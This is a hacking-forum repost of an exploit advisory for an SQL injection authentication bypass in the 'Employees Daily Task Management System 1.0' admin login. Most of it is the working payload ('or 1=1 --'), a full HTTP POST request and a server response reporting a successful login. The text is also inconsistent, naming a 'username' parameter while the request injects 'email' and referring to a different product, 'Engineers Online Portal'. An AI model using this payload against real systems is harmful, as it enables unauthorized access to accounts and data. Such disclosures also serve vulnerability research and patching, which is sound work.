跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass


HACK1949

推荐的帖子

# Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass
# Exploit Author: able403
# Date: 08/12/2021
# Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip
# Version: 1.0
# Tested on: windows 10 
# Vulnerable page: Actions.php
# VUlnerable parameters: "username"

Technical description:

An SQL Injection vulnerability exists in theEmployees Daily Task Management System admin login form which can allow an attacker to bypass authentication.

Steps to exploit:

1) Navigate to http://localhost/login.php

2) Insert your payload in the user or password field 

3) Click login

Proof of concept (Poc):

The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form - 

123'+or+1=1+--+-




--- 




POST /Actions.php?a=employee_login HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 43

Origin: http://edtms.com

Connection: close

Referer: http://edtms.com/login.php

Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl




email=admin'+or+1=1+--+-&password=123123213




response




HTTP/1.1 200 OK

Date: Wed, 10 Nov 2021 02:23:38 GMT

Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02

X-Powered-By: PHP/8.0.2

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Connection: close

Content-Type: text/html; charset=UTF-8

Content-Length: 48




{"status":"success","msg":"Login successfully."}




---
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...